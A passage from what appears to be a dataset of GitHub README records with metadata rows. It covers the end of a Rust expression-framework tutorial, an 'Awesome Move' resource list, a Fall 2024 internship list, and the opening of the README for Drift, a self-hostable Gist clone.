/// Build expression with runtime information.
pub fn build_binary_expression(
f: ExpressionFunc,
i1: DataType,
i2: DataType,
) -> Box<dyn Expression> {
use ExpressionFunc::*;
use crate::expr::cmp::*;
use crate::expr::string::*;
match f {
CmpLe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, cmp_le },
CmpGe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, cmp_ge },
CmpEq => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, cmp_eq },
CmpNe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, cmp_ne },
StrContains => Box::new(BinaryExpression::<String, String, bool, _>::new(
str_contains,
)),
}
}
```
The goal is to write as less code as possible to generate all combinations of comparison.
## Day 8: List Type
In Apache Arrow, we have `ListArray`, which is equivalent to `Vec<Option<Vec<Option<T>>>>`. We implement this in
day 8.
```rust
let mut builder = ListArrayBuilder::with_capacity(0);
builder.push(Some((&/* Some ArrayImpl */).into()));
builder.push(Some((&/* Some ArrayImpl */).into()));
builder.push(None);
builder.finish();
```
## Day 9: Boxed Array
Use `Box<dyn Array>` instead of `ArrayImpl` enum.
To make as few modifications as possible to the current codebase, we add two traits:
* `PhysicalTypeOf`: gets the physical type out of Array.
* `DynArray`: the object safe trait for Array.
Then, we can have `pub struct BoxedArray(Box<dyn DynArray>);` for dynamic dispatch.
## Day 10: Expression Framework
Now we are having more and more expression kinds, and we need an expression framework to unify them -- including
unary, binary and expressions of more inputs.
At the same time, we will also experiment with return value optimizations in variable-size types.
# TBD Lectures
## Day 11: Aggregators
Aggregators are another kind of expressions. We learn how to implement them easily with our type system in day 10.
| Learn Rust black magics by implementing an expression framework in database systems | rust,database,type,tutorial | 0 | 6 | 12 | 57 | 0 | 3 | 1 |
MystenLabs/awesome-move | <!--lint disable double-link-->
# Awesome Move [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)
> A curated list of code and content from the [Move](https://github.com/move-language/move) programming language community.
Move is a programming language for writing safe smart contracts originally developed at Facebook to power the Libra blockchain. Move is designed to be a platform-agnostic language to enable common libraries, tooling, and developer communities across diverse blockchains with vastly different data and execution models. Move's ambition is to become the "JavaScript of web3" in terms of ubiquity--when developers want to quickly write safe code involving assets, it should be written in Move.
## Contents
- [Overview](#overview)
- [Move-Powered Blockchains](#move-powered-blockchains)
- [Books](#books)
- [Tutorials](#tutorials)
- [Community](#community)
- [Code](#code)
- [Fungible Tokens](#fungible-tokens)
- [Non-Fungible Tokens](#non-fungible-tokens)
- [Decentralized Identity](#decentralized-identity)
- [DeFi](#defi)
- [SocialFi](#socialfi)
- [On-Chain Governance](#on-chain-governance)
- [Cross-Chain Bridge](#cross-chain-bridge)
- [Accounts](#accounts)
- [Frameworks](#frameworks)
- [Libraries](#libraries)
- [Miscellaneous](#miscellaneous)
- [Tools](#tools)
- [IDEs](#ides)
- [Package Managers](#package-managers)
- [Wallets](#wallets)
- [SDKs](#sdks)
- [Papers](#papers)
- [Language Design](#language-design)
- [Static Analysis and Verification](#static-analysis-and-verification)
- [Videos](#videos)
- [Slides](#slides)
- [Podcasts](#podcasts)
- [Blog Posts](#blog-posts)
- [Security](#security)
## Overview
- [Installation](https://github.com/move-language/move/tree/main/language/tools/move-cli#installation)
- [Problem Statement](https://github.com/mystenlabs/awesome-move/blob/main/docs/problem_statement.md#problem-statement)
## Move-Powered Blockchains
- [Sui](https://github.com/MystenLabs/sui) - A next-generation smart contract platform with high throughput, low latency, and an asset-oriented programming model powered by the Move programming language (in [devnet](https://medium.com/mysten-labs/sui-devnet-public-release-a2be304ff36b)).
- [0L](https://github.com/OLSF/libra) - A reference implementation of a neutral replicated state machine. Forked from the Libra/Diem technologies (in [mainnet](https://0l.network/)).
- [Starcoin](https://github.com/starcoinorg/starcoin) - A smart contract blockchain network that scales by layering (in [mainnet](https://stcscan.io/)).
- [Aptos](https://github.com/aptos-labs/aptos-core) - Aptos-core strives towards being the safest and most scalable layer one blockchain solution (in [mainnet](https://explorer.aptoslabs.com/?network=mainnet)).
- [Pontem](https://github.com/pontem-network/pontem) - Substrate based parachain with MoveVM onboard (in [testnet](https://polkadot.js.org/apps/?rpc=wss://testnet.pontem.network/ws#/explorer)).
- [Celo](https://github.com/celo-org/celo-blockchain) - Blockchain with EVM and MoveVM ([coming soon](https://www.businesswire.com/news/home/20210921006104/en/Celo-Sets-Sights-On-Becoming-Fastest-EVM-Chain-Through-Collaboration-With-Mysten-Labs)).
- [Diem](https://github.com/diem/diem) - The original Move based blockchain from Meta (form. Libra by Facebook) (discontinued).
- [ChainX](https://github.com/chainx-org/ChainX) - Bitcoin's layer2 smart contract network has already supported WASM and EVM, and is supporting MoveVM (in [mainnet](https://scan.chainx.org)).
## Books
- [Move Book](https://move-language.github.io/move/) - Move book maintained by the Move core team ([中文](https://github.com/move-language/move/tree/main/language/documentation/book/translations/move-book-zh)).
- [Move Book](https://move-book.com/) - Move book maintained by [@damirka](https://github.com/damirka) ([中文](https://move-book.com/cn/)).
- [Move Patterns](https://www.move-patterns.com/) - A book on Move software design patterns maintained by [@villesundell](https://github.com/villesundell).
- [Sui Move by Example](https://examples.sui.io/) - A book on the Sui Move variant maintained by [@MystenLabs](https://github.com/MystenLabs).
## Tutorials
- [Implementing, testing, and verifying a fungible token](https://github.com/move-language/move/tree/main/language/documentation/tutorial) - Maintained by the Move core team.
- [Programming with objects](https://docs.sui.io/build/programming-with-objects) - Maintained by the Sui team.
- [Move and SmartContract Development](https://starcoinorg.github.io/starcoin-cookbook/docs/move/) - Maintained by the Starcoin team.
- [Move Language](https://imcoding.online/courses/move-language) - Interactive Move language course, free for everyone, maintained by [imcoding.online](https://imcoding.online) ([中文](https://imcoding.online/courses/move-language?lng=zh)).
## Community
- [Move Language Discord](https://discord.gg/cPUmhe24Mz)
- [Move @ Sui by Mysten Labs Discord](https://discord.gg/sui)
- [Move @ 0L Discord](https://discord.gg/0lnetwork)
- [Move @ Starcoin Discord](https://discord.gg/starcoin)
- [Move @ Aptos Discord](https://discord.gg/aptoslabs)
- [MoveChina](https://move-china.com) - The largest Chinese community for the Move programming language.
## Code
Code written in Move.
### Fungible Tokens
- [Fungible token examples](https://github.com/MystenLabs/sui/tree/main/sui_programmability/examples/fungible_tokens) - Multiple example token implementations from Sui.
- [BasicCoin](https://github.com/move-language/move/tree/main/language/documentation/examples/experimental/basic-coin) - A toy implementation of an [ERC20](https://ethereum.org/en/developers/docs/standards/tokens/erc-20/)-like fungible token.
- [Diem](https://github.com/OLSF/libra/blob/main/language/diem-framework/modules/Diem.move) - An ERC20-like token with permissioned minting/burning, see also this [spec](https://github.com/diem/dip/blob/main/dips/dip-20.md). Deployed on 0L.
- [Token](https://github.com/starcoinorg/starcoin-framework/blob/main/sources/Token.move) - Another ERC20-like Token. Deployed on Starcoin.
- [GAS](https://github.com/OLSF/libra/blob/main/language/diem-framework/modules/0L/GAS.move) - A token that instantiates the Diem standard above. Deployed on 0L.
- [STC](https://github.com/starcoinorg/starcoin-framework/blob/main/sources/STC.move) - A token that instantiates the Starcoin standard above. Deployed on Starcoin.
- [STAR](https://github.com/Elements-Studio/starswap-core/blob/master/sources/gov/STAR.move) - A governance token of Starswap dApp that powers the AMM+DEX ecosystem. Deployed on Starcoin.
- [XUSDT](https://github.com/Elements-Studio/poly-stc-contracts/blob/master/sources/asset/erc20/XUSDT.move) - A mapped assets of USDT on Starcoin.
- [XETH](https://github.com/Elements-Studio/poly-stc-contracts/blob/master/sources/asset/erc20/XETH.move) - A mapped assets of ETH on Starcoin.
- [WEN stablecoin](https://github.com/wenwenprotocol/wen-protocol) - Deployed on Starcoin.
- [FAI stablecoin](https://github.com/BFlyFinance/FAI) - An over-collateralized stable coin deployed on Starcoin.
- [FLY stablecoin](https://github.com/BFlyFinance/FLY) - An implementation of forked OHM that deployed on Starcoin.
- [Synthetic token backed by a basket containing a reserve of other tokens](https://github.com/OLSF/libra/blob/main/language/diem-framework/modules/XDX.move) - From Diem.
- [XBTC](https://github.com/OmniBTC/OmniBridge/blob/main/aptos/bridge/sources/xbtc.move) - BTC mirror asset on Aptos.
- [XBTC](https://github.com/OmniBTC/OmniBridge/blob/main/sui/bridge/sources/xbtc.move) - BTC mirror asset on Sui.
### Non-Fungible Tokens
- [NFT examples](https://github.com/MystenLabs/sui/tree/main/sui_programmability/examples/nfts) - Multiple NFT example implementations from Sui.
- [NFT](https://github.com/starcoinorg/starcoin-framework/blob/main/sources/NFT.move) - An ERC721-like token. Deployed on Starcoin.
- [Merkle Airdrop](https://github.com/starcoinorg/starcoin-framework/blob/main/sources/MerkleNFT.move) - Utility for airdropping a large number of NFTs. Deployed on Starcoin.
- [NFT](https://github.com/diem/diem/blob/main/diem-move/diem-framework/experimental/sources/NFT.move) - An implementation of a hybrid ERC721/ERC1155-like token. From Diem.
- [BARS](https://github.com/diem/diem/blob/main/diem-move/diem-framework/experimental/sources/BARS.move) - An NFT that instantiates this hybrid standard. From Diem.
- [MultiToken](https://github.com/diem/diem/blob/main/diem-move/diem-framework/experimental/sources/MultiToken.move) - An ERC1155-like token. From Diem.
- [NFTGallery](https://github.com/diem/diem/blob/main/diem-move/diem-framework/experimental/sources/NFTGallery.move) - Utility for holding multiple NFT's of the same type. From Diem.
- [NFT Protocol](https://github.com/Origin-Byte/nft-protocol) - NFT protocol and collection framework. From OriginByte.
- [Suia](https://github.com/Mynft/suia) - The first POAP application on Sui.
### Decentralized Identity
- [aptos-cid](https://github.com/coming-chat/aptos-cid) - Decentralized identity on Aptos, the underlying account system of ComingChat.
- [MoveDID](https://github.com/NonceGeek/MoveDID) - MoveDID is a DID protocol that compatible with Move-based blockchain networks, including Aptos, Sui, and Starcoin. Maintained by the [NonceGeek](https://github.com/NonceGeek).
### DeFi
- [DeFi examples](https://github.com/MystenLabs/sui/tree/main/sui_programmability/examples/defi) - Multiple DeFi example implementations from Sui.
- [CoinSwap](https://github.com/move-language/move/tree/main/language/documentation/examples/experimental/coin-swap) - A toy implementation of a [Uniswap](https://uniswap.org/)-like liquidity pool containing two tokens.
- [Starswap](https://github.com/Elements-Studio/starswap-core) - A Uniswap-style DEX. Deployed on Starcoin.
- [Offer](https://github.com/move-language/move/blob/main/language/move-stdlib/nursery/sources/offer.move) - Generic implementation of atomic swaps for any pair of assets.
- [AptosRedPacket](https://github.com/coming-chat/aptos-red-packet) - A red packet social app that combines private chat and encrypted wallet on Aptos.
- [SuiRedPacket](https://github.com/coming-chat/sui-red-packet) - A red packet social app that combines private chat and encrypted wallet on Sui.
- [AptosAMMswap](https://github.com/OmniBTC/Aptos-AMM-swap) - Aptos AMM Swap implemented by the OmniBTC team.
- [SuiAMMswap](https://github.com/OmniBTC/Sui-AMM-swap) - Sui AMM Swap implemented by the OmniBTC team.
- [AptosOmniSwap](https://github.com/OmniBTC/OmniSwap/tree/main/aptos) - One-click swap between aptos and EVM chains (such as ETH/BSC/AVAX, etc.) based on the cross-chain interoperability protocol wormhole.
- [DolaProtocol](https://github.com/OmniBTC/DolaProtocol) - A Decentralized Omnichain Liquidity Aggregation Protocol with the single coin pool of each public chain as the core, Wormhole, Layerzero and other cross-chain messaging protocols as the bridge, and Sui public chain as the settlement center.
- [ObjectMarket](https://github.com/coming-chat/object-market) - A unique object trading marketplace in the Sui network.
### SocialFi
- [Dmens](https://github.com/coming-chat/Dmens) - Decentralized Moments which is a Blockchain Twitter Protocol built on the Sui network.
### On-Chain Governance
- [ValidatorUniverse](https://github.com/OLSF/libra/blob/main/language/diem-framework/modules/0L/ValidatorUniverse.move) - Validator set management. Deployed on 0L.
- [Oracle](https://github.com/OLSF/libra/blob/main/language/diem-framework/modules/0L/Oracle.move) - For on-chain community voting. Deployed on 0L.
- [DAO](https://github.com/starcoinorg/starcoin-framework/blob/main/sources/Dao.move) - For on-chain proposals and voting. Deployed on Starcoin.
- [DiemSystem](https://github.com/diem/diem/blob/main/diem-move/diem-framework/DPN/sources/DiemSystem.move) - Validator set management. From Diem.
- [Vote](https://github.com/diem/diem/blob/main/diem-move/diem-framework/experimental/sources/Vote.move) - On-chain voting. From Diem.
### Cross-Chain Bridge
- [Poly Bridge](https://github.com/Elements-Studio/poly-stc-contracts) - The first Cross-Chain Bridge between Move and EVM. Deployed on Starcoin.
- [OmniBTC Bridge](https://github.com/OmniBTC/OmniBridge) - A bridge between Bitcoin and Move language public chains (like Aptos and Sui) based on ultra-light node.
### Accounts
- [Account](https://github.com/diem/diem/blob/main/diem-move/diem-framework/core/sources/Account.move) - A generic account for Diem-powered chains. From Diem.
- [DiemAccount](https://github.com/OLSF/libra/blob/main/language/diem-framework/modules/DiemAccount.move) - Fork of the above. From 0L.
- [Account](https://github.com/starcoinorg/starcoin-framework/blob/main/sources/Account.move) - Fork of the above. From Starcoin.
### Frameworks
A Move **framework** is the set of Move modules included in the genesis state of the chain.
These modules typically implement key concepts like accounts, currencies, .
The ability to separate blockchain-specific framework logic from the generic functionality of the Move language is a key part of Move's platform-agnostic design.
- [Sui Framework](https://github.com/MystenLabs/sui/tree/main/crates/sui-framework)
- [Aptos Framework](https://github.com/aptos-labs/aptos-core/tree/main/aptos-move/framework)
- [0L Framework](https://github.com/OLSF/libra/tree/main/language/diem-framework/modules/0L)
- [Starcoin Framework](https://github.com/starcoinorg/starcoin-framework)
- [Diem Framework](https://github.com/diem/diem/tree/main/diem-move/diem-framework/DPN)
### Libraries
- [Move standard library](https://github.com/move-language/move/tree/main/language/move-stdlib) - Utilities intended (but not required) to be used in every platform running Move. From the Move repo.
- [Move nursery](https://github.com/move-language/move/tree/main/language/move-stdlib/nursery) - Experimental modules that may eventually be promoted into the standard library. From the Move repo.
- [Decimal](https://github.com/OLSF/libra/blob/main/language/diem-framework/modules/0L/Decimal.move) - Efficient implementation of a decimal value. From 0L.
- [Math](https://github.com/starcoinorg/starcoin-framework/blob/main/sources/Math.move) - Math utility functions. From Starcoin.
- [Compare](https://github.com/move-language/move/blob/main/language/move-stdlib/nursery/sources/compare.move) - Polymorphic comparison (i.e., compare any two Move values of the same type). From the nursery.
- [Vault](https://github.com/move-language/move/blob/main/language/move-stdlib/nursery/sources/vault.move) - Library for capabilities. From the nursery.
- [ACL](https://github.com/move-language/move/blob/main/language/move-stdlib/nursery/sources/acl.move) - Library for list-based access control. From the nursery.
- [TaoHe](https://github.com/taoheorg/taohe) - A collection of nestable Move resources.
- [Starcoin Framework Commons](https://github.com/starcoinorg/starcoin-framework-commons) - Libraries for Move commons utility on starcoin-framework. From Starcoin.
- [Movemate](https://github.com/pentagonxyz/movemate) - Smart contract building blocks for Aptos and Sui (Math utilities, governance contracts, escrow, and more). Maintained by the Pentagon team.
- [Move cron parser](https://github.com/snowflake-so/move-cron-parser#readme) - Library is built for a purpose of parsing cron expression. Maintained by Snowflake Network team.
### Miscellaneous
- [Move-on-EVM](https://github.com/move-language/move/tree/main/language/evm) - Experimental project to compile Move source code to EVM bytecode.
- [aoc-move](https://github.com/whonore/aoc-move) - Advent of Code solutions in Move with some formal verification.
## Tools
- [Move Package Manager](https://github.com/move-language/move/tree/main/language/tools/move-cli) - Like `cargo` or `npm` for Move: single CLI (and corresponding Rust API's for other tools to hook into) for building, running, testing, debugging, and verifying Move [packages](https://move-language.github.io/move/). Maintained by the Move core team.
- [Move Prover](https://github.com/move-language/move/tree/main/language/move-prover) - Formal verification of user-defined specifications written in Move source code. Maintained by the Move core team.
- [Move Read/Write Set Analyzer](https://github.com/move-language/move/tree/main/language/tools/read-write-set) - Static analysis tool for computing an overapproximation of the global memory touched by a Move program. Maintained by the Move core team.
- [Move Playground JS Library](https://github.com/imcoding-online/js-move-playground) - Wrapping [Move Playground by Pontem](https://playground.pontem.network/) as a JavaScript library for browser. You can use it to build your own Move Playground.
- [go-sui-indexer](https://github.com/coming-chat/go-sui-indexer) - An off-fullnode service to serve data from Sui Node.
## IDEs
- [Move VS Code plugin](https://marketplace.visualstudio.com/items?itemName=move.move-analyzer) - Maintained by the Move core team ([source code](https://github.com/move-language/move/tree/main/language/move-analyzer)).
- [Move IntelliJ plugin](https://plugins.jetbrains.com/plugin/14721-move-language) - Maintained by the Pontem team ([source code](https://github.com/pontem-network/intellij-move)).
- [Move Playground](https://playground.pontem.network/) - Like [Remix](https://remix.ethereum.org/) for Move. Alpha version of a Web IDE. See [instructions](https://gist.github.com/borispovod/64b6d23741d8c1f4b0b958a3a74aa68d). Maintained by the Pontem team.
- [Starcoin IDE](https://marketplace.visualstudio.com/items?itemName=starcoinorg.starcoin-ide) - Maintained by the Starcoin team ([source code](https://github.com/starcoinorg/starcoin-ide)).
- [Move Vim](https://github.com/rvmelkonian/move.vim) - Maintained by [@rvmelkonian](https://github.com/rvmelkonian/).
- [move-mode](https://github.com/amnn/move-mode) - Major mode for Emacs maintained by [@amnn](https://github.com/amnn/).
## Package Managers
- [Movey](https://www.movey.net/) - A crates.io-style repository of Move packages.
## Wallets
- [StarMask](https://github.com/starcoinorg/starmask-extension) - A wallet for the Starcoin blockchain. Maintained by the Starcoin team ([Chrome Webstore](https://chrome.google.com/webstore/detail/starmask/mfhbebgoclkghebffdldpobeajmbecfk?hl=en)).
- [Sui Wallet](https://github.com/MystenLabs/sui/tree/main/apps/wallet) - A chrome (v88+) extension wallet for Sui ([Chrome Webstore](https://chrome.google.com/webstore/detail/sui-wallet/opcgpfmipidbgpenhmajoajpbobppdil)).
- [Pontem Wallet](https://github.com/pontem-network/pontem-wallet) - Wallet extension for Aptos network by the Pontem team ([Chrome Webstore](https://chrome.google.com/webstore/detail/pontem-wallet/phkbamefinggmakgklpkljjmgibohnba)).
- [Fewcha Aptos Wallet](https://github.com/fewcha-wallet/fewcha.app) - The wallet of layer 1 blockchain Aptos ([Chrome Webstore](https://chrome.google.com/webstore/detail/fewcha-aptos-wallet/ebfidpplhabeedpnhjnobghokpiioolj)).
- [bcs-js](https://github.com/pontem-network/lcs-js) - JavaScript implementation of the [BCS](https://github.com/diem/bcs) serialization scheme used by Move, may be useful for implementing wallets.
- [ComingChat](https://coming.chat/) - A decentralized social finance/web3 portal. Supporting public chain wallets, such as Sui and Aptos wallets.
- [Suiet Wallet](https://github.com/suiet/suiet) - A open-source wallet for Sui. ([Chrome Webstore](https://chrome.google.com/webstore/detail/suiet/khpkpbbcccdmmclmpigdgddabeilkdpd), [Website](https://suiet.app))
- [Ethos Wallet](https://github.com/EthosWallet/chrome-extension) - Open-source chrome extension wallet for Sui ([Chrome Webstore](https://chrome.google.com/webstore/detail/ethos-sui-wallet/mcbigmjiafegjnnogedioegffbooigli), [Website](https://ethoswallet.xyz/)).
### Wallet Adapters
- [Sui Wallet](https://github.com/MystenLabs/sui/tree/main/sdk/wallet-adapter) - Sui Wallet Adapter.
- [Suiet Wallet](https://github.com/suiet/wallet-adapter) - Suiet Wallet Adapter.
### Wallet Kits
- [Suiet Wallet Kit](https://github.com/suiet/wallet-kit) - A package support all Sui wallets with customizable UI.
- [Ethos Connect](https://github.com/EthosWallet/ethos-connect) - UI with built-in wallet adapter and Email option for supporting all wallets and wallet-less users on Sui.
## SDKs
### Sui SDKs
- [Rust SDK](https://docs.sui.io/devnet/build/rust-sdk) (official)
- [TS/JS SDK](https://github.com/MystenLabs/sui/tree/main/sdk/typescript) (official)
- [Golang SDK 1](https://github.com/coming-chat/go-sui-sdk) (community)
- [Golang SDK 2](https://github.com/block-vision/sui-go-sdk) (community)
- [Python SDK](https://github.com/FrankC01/pysui) (community)
- [Java SDK](https://github.com/GrapeBaBa/sui4j) (community)
- [Kotlin SDK](https://github.com/cosmostation/suikotlin) (community)
- [C# SDK](https://github.com/naami-finance/SuiNet) (community)
### Sui Dapps SDKs
- [OmniSwap-Sui-SDK](https://github.com/OmniBTC/OmniSwap-Sui-SDK) (community)
### Other network SDKs
- [Aptos Golang SDK](https://github.com/coming-chat/go-aptos-sdk) (community)
## Papers
### Language Design
- [Move: A Language With Programmable Resources](https://developers.diem.com/papers/diem-move-a-language-with-programmable-resources/2019-06-18.pdf) - This was the original Move white paper released in 2018. Many aspects of this are now out of date (e.g., the syntax and description of the bytecode instructions), but the first two sections are worth a read for explaining the difficulties of programming with assets and how Move tackles them.
- [Robust Safety for Move](https://arxiv.org/abs/2110.05043)
- [The Move Borrow Checker](https://arxiv.org/abs/2205.05181)
- [Resources: A Safe Language Abstraction for Money](https://arxiv.org/abs/2004.05106)
### Static Analysis and Verification
- [Fast and Reliable Formal Verification of Smart Contracts with the Move Prover](https://arxiv.org/abs/2110.08362)
- [The Move Prover](https://research.facebook.com/publications/the-move-prover/)
- [Verification of Programs Written in Libra's Move Language](https://ethz.ch/content/dam/ethz/special-interest/infk/chair-program-method/pm/documents/Education/Theses/Constantin_M%C3%BCller_MS_Report.pdf)
- [Exact and Linear-Time Gas-Cost Analysis](https://research.facebook.com/publications/exact-and-linear-time-gas-cost-analysis/)
## Videos
- [The Move Programming Language](https://youtu.be/J1U_0exNFu0)
- [Move on Sui](https://www.youtube.com/watch?v=xMsE1X4wio4)
- [Move on Aptos](https://www.youtube.com/watch?v=gvRJdJTQd8U)
- [Move: A Safe Language for Programming with Money](https://www.youtube.com/watch?v=EG2-7bQNPv4&ab_channel=FieldsInstitute) - Talk from [@sblackshear](https://github.com/sblackshear) at the [Fields Institute Blockchain](http://www.fields.utoronto.ca/activities/seminar_series/blockchain-research-seminar-series) research seminar series.
- [Formal Verification of Move Programs for the Libra Blockchain](http://www.fields.utoronto.ca/talks/Formal-verification-Move-programs-Libra-blockchain) - Talk from [@DavidLDill](https://github.com/DavidLDill) at the [Fields Institute Blockchain](http://www.fields.utoronto.ca/activities/seminar_series/blockchain-research-seminar-series) research seminar series.
- [Move for the Masses](https://www.youtube.com/watch?v=b_2jZ4YEfWc) - Talk at the [Converge '22](https://converge.circle.com/event/4ea0d06f-3900-4b6d-a9cd-aeaedda9ef2e/summary).
## Slides
- [Move deep dive](https://docs.google.com/presentation/d/1Tb2iZD0xrQSlwXIJNL1djNYc0_p0szfB2STgURgHgls/edit?usp=sharing)
- [Move overview](https://docs.google.com/presentation/d/1gU-M42Juz7ARc61unPXphJ_BX1OlQrBwR1VdaPT4M5w/edit?usp=sharing) - Slides from [Reasoning About Financial Systems](https://reasoningaboutfinancialsystems.org/) workshop at [SBC '22](https://cbr.stanford.edu/sbc22/).
## Podcasts
- [Move and Sui with Sam Blackshear from Mysten Labs](https://zeroknowledge.fm/228-2/)
- [Move AMA covering Move origin story](https://twitter.com/i/spaces/1jMKgepNOleJL)
## Blog Posts
- [Comparing Move and Rust smart contract development](https://medium.com/@kklas/smart-contract-development-move-vs-rust-4d8f84754a8f)
- [Comparing Diem-style Move and Sui Move](https://sui.io/resources-move/why-we-created-sui-move)
## Security
- [Aptos-movevm Denial of Service Vulnerability](https://medium.com/numen-cyber-labs/analysis-of-the-first-critical-0-day-vulnerability-of-aptos-move-vm-8c1fd6c2b98e)
## Contributing
Contributions welcome! Read the [contribution guidelines](CONTRIBUTING.md) first.
| Code and content from the Move community. | awesome,awesome-list | 0 | 41 | 87 | 136 | 6 | 2 | 2 |
bsovs/Fall2024-Internships | # Fall2024-Internships
**Should start posting in February 2024**
Collection of Fall 2024 tech internships!
Shoutout to GitHub user **[bsovs](https://github.com/bsovs)** and **[The Pitt CS Club](https://github.com/pittcsc)** for developing the initial framework and list.
---
<div align="center">
<p>
<a href="https://simplify.jobs/?invite=2d8fe25021b&utm_source=referral">
<b>Applying to internships?</b>
<br>
Autofill all your applications in a single click.
<br>
<div>
<img src="https://res.cloudinary.com/dpeo4xcnc/image/upload/v1636594918/simplify_pittcsc.png" width="450" alt="Simplify">
</div>
</a>
<sub><i>Stop manually re-entering your information. Simplify’s extension helps you autofill internship applications on millions of sites.</i></sub>
</p>
</div>
Check out SimplifyJobs list: https://simplify.jobs/l/Top-Fall-Internships
---
To contribute:
1. Fork repository
2. Edit README.md
3. Open a pull request!
---
📈 For tips on the internship process check out the [Zero to Offer program here](https://www.pittcs.wiki/zero-to-offer). 📈
🤗 **Contribute by submitting a [pull request](https://github.com/susam/gitpr#create-pull-request)!** 🤗
:warning: **This repository is only for internships/co-ops in the United States, Canada or for Remote positions :earth_americas:.**
## The List 👔
| Name | Location | Application Period | Notes |
|---|-------------|-------------|-------------|
|[Astranis](https://simplify.jobs/p/32567b79-e4ee-4a71-bf95-11a392999a71/Software-Developer--Intern-NetworkPayload-Software-Summer-2024)| San Francisco, CA | 🔒 Closed 🔒 | Software Developer – Intern
|[Astranis](https://simplify.jobs/p/3522dad6-9198-4047-9211-3b26a01e6880/Flight-Software-Engineer--Intern-Fall-2024)| San Francisco, CA | Open | Flight Software Engineer – Intern
|[SpaceX](https://boards.greenhouse.io/spacex/jobs/7268802002?gh_jid=7268802002&gh_src=d88665492us)| <details><summary>**8 locations**</summary>Austin, TX<br /> Irvine, CA<br /> Cape Canaveral, FL<br /> Brownsville, TX<br /> Redmond, WA<br /> McGregor, TX<br /> West Athens, CA<br /> Sunnyvale, CA | Open | Fall 2024 Software Engineering Internship/Co-op
|[Rocket Lab](https://simplify.jobs/p/9165e993-19cd-48b2-930f-735e4a686343/Software--Fall-2024-Internship)| Toronto, Canada | 🔒 Closed 🔒 | Software – Fall 2024 Internship
|[Relativity Space](https://simplify.jobs/p/297bb608-e105-4492-a2ca-5ec8e5889926/Software-Engineer-Intern-Fall-2024)| Long Beach, CA | 🔒 Closed 🔒 | Software Engineer Intern
|[Tesla](https://www.tesla.com/careers/search/job/internship-software-engineer-cell-engineering-fall-2024-219030)| <details><summary>**5 locations**</summary>Palo Alto, CA<br /> Fremont, CA<br /> Austin, TX<br /> Reno, NV<br /> Toronto, ON | 🔒 Closed 🔒 | Internship, Software Engineer, Cell Engineering
| [Amazon](https://www.amazon.jobs/en/jobs/2408098/software-development-engineer-internship-2024-us) | <details><summary>**46 locations**</summary>Phoenix, AZ <br /> Tempe, AZ <br /> Berkeley, CA <br /> Culver City, CA <br /> Cupertino, CA <br /> East Palo Alto, CA <br /> Irvine, CA <br /> Los Angeles, CA <br /> Manhattan Beach, CA <br /> Palo Alto, CA <br /> San Diego, CA <br /> San Francisco, CA <br /> San Jose, CA <br /> San Luis Obispo, CA <br /> Santa Barbara, CA <br /> Santa Clara, CA <br /> Santa Cruz, CA <br /> Santa Monica, CA <br /> Sunnyvale, CA <br /> Boulder, CO <br /> Denver, CO <br /> Atlanta, GA <br /> Kennesaw, GA <br /> Chicago, IL <br /> Boston, MA <br /> Cambridge, MA <br /> Hudson, MA <br /> North Reading, MA <br /> Westborough, MA <br /> Baltimore, MD <br /> Detroit, MI <br /> Minneapolis, MN <br /> Jersey City, NJ <br /> New York, NY <br /> Portland, OR <br /> Philadelphia, PA <br /> Pittsburgh, PA <br /> Nashville, TN <br /> Austin, TX <br /> Dallas, TX <br /> Arlington, VA <br /> Herndon, VA <br /> Madison, WI <br /> Bellevue, WA <br /> Seattle, WA <br /> Redmond, WA | 🔒 Closed 🔒 | Software Development Engineer Internship
|[Rocket Lab](https://simplify.jobs/p/09b4b2ba-c6ea-49de-b902-3713f1fba5df/Quality-Engineering--Fall-2024-Internship)| Toronto, Canada | Open | Quality Engineer Intern
|[Zoox](https://simplify.jobs/p/240f0e84-5a0f-44cb-a527-00f6db58716d/Fall--Software-Engineering-InternshipCo-op-Firmware-Tools)| San Mateo, CA | Open | Software Engineering Intern
## Other Semesters
[Fall 2023 - bsovs](https://github.com/bsovs/Fall2024-Internships/tree/main/Fall2023)
[Fall 2022 - bsovs](https://github.com/bsovs/Fall2024-Internships/tree/main/Fall2022)
[Summer 2022 - (Pitt-CSC List)](https://github.com/Pitt-CSC/Summer2021-Internships)
[Fall 2021](https://github.com/BaruYogesh/Fall2021Internships)
## Contributors
jdkuffa <3
| Collection of Fall 2023 tech internships! | internship,jobs | 0 | 80 | 134 | 341 | 0 | 2 | 0 |
MaxLeiter/Drift | # <img src="src/public/assets/logo.png" height="32px" alt="" /> Drift
> **Note:** This branch is where all work is being done to refactor to the Next.js 13 app directory and React Server Components.
Drift is a self-hostable Gist clone. It's in beta, but is completely functional.
You can try a demo at https://drift.lol. The demo is built on main but has no database, so files and accounts can be wiped at any time.
If you want to contribute, need support, or want to stay updated, you can join the IRC channel at #drift on irc.libera.chat or [reach me on twitter](https://twitter.com/Max_Leiter). If you don't have an IRC client yet, you can use a webclient [here](https://demo.thelounge.chat/#/connect?join=%23drift&nick=drift-user&realname=Drift%20User).
Drift is built with Next.js 13, React Server Components, [shadcn/ui](https://github.com/shadcn/ui), and [Prisma](https://prisma.io/).
<hr />
**Contents:**
- [Setup](#setup)
- [Development](#development)
- [Production](#production)
- [Environment variables](#environment-variables)
- [Running with pm2](#running-with-pm2)
- [Running with Docker](#running-with-docker)
- [Current status](#current-status)
## Setup
### Development
In the root directory, run `pnpm i`. If you need `pnpm`, you can download it [here](https://pnpm.io/installation).
You can run `pnpm dev` in `client` for file watching and live reloading.
To work with [prisma](prisma.io/), you can use `pnpm prisma` or `pnpm exec prisma` to interact with the database.
### Production
`pnpm build` will produce production code. `pnpm start` will start the Next.js server.
### Environment Variables
You can change these to your liking.
`.env`:
- `DRIFT_URL`: the URL of the drift instance.
- `DATABASE_URL`: the URL to connect to your postgres instance. For example, `postgresql://user:password@localhost:5432/drift`.
- `WELCOME_CONTENT`: a markdown string that's rendered on the home page
- `WELCOME_TITLE`: the file title for the post on the homepage.
- `ENABLE_ADMIN`: the first account created is an administrator account
- `REGISTRATION_PASSWORD`: the password required to register an account. If not set, no password is required.
- `NODE_ENV`: defaults to development, can be `production`
#### Auth environment variables
**Note:** Only credential auth currently supports the registration password, so if you want to secure registration, you must use only credential auth.
- `GITHUB_CLIENT_ID`: the client ID for GitHub OAuth.
